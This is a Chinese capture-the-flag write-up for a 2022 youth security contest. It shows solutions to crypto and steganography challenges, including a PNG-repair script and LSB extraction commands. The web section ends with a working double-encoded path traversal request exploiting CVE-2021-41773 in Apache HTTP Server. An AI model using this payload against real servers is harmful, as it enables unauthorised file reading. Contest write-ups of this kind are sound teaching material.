第六届强网杯青少年专项赛Writeup

2022年09月11日技术约 495 字大概 2 分钟

这次失了大策，web拉胯了

Crypto

crypto1

没有规则的乱文，该怎么进行分析呢？

下载一堆AB 字符串，试了一下培根不行，然后试了一下摩斯电码，得到一堆英文

我们直接 quipqiup 跑一下得到 flag

Misc

misc1

你知道万能和弦是什么吗?

下载附件里面是一个 png 图片，但是打开提示文件损坏，使用记事本打开发现是base64格式的图片。

使用 CyberChef 解码了一下发现16进制数据顺序颠倒了，正常数据头应该为 89 50 4e 47，也就是奇数位和偶数位互换了

撸个脚本转换一下

import base64
import binascii

listData = []
newData = ''

with open('chuyinweilai.png', 'rb') as f:
    data = str(binascii.hexlify(base64.b64decode(f.read())), encoding='utf-8')
    for i in range(0, len(data), 2):
        listData.append(data[i:i+2])
    for j in range(0, len(listData), 2):
        newData += str(listData[j+1] + listData[j])

with open('flag.png', 'wb') as f:
    f.write(binascii.unhexlify(newData))

得到图片

直接 lsb 解密即可，密码根据题目描述百度搜索万能和旋得到 4536251

1	`python2 lsb.py extract flag.png flag.txt 4536251`

misc3

隐写术是一门关于信息隐藏的技巧与科学，隐写的信息看起来像一些其他的东西，隐写不同于加密，加密是一段你看不懂的东西，隐写是一段你似乎能看懂的东西。现在，这里用了一种最简单的隐写方式隐藏了一些信息，你能找到它么？

下载附件，在数据尾发现一个密码 7his_1s_p4s5w0rd ，解压文件得到 FindHideMsg.png

分离 FindHideMsg.png 文件后得到新图 secret.png 同时多出来一部分(我圈出来的地方)

既然是 lsb 隐写，我们直接用脚本解密

1	`python2 lsb.py extract secret.png flag.txt 7his_1s_p4s5w0rd`

Web

Web1

存在CVE-2021-41773，你能得到flag吗？

没啥好说的，签到题

1	`/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag`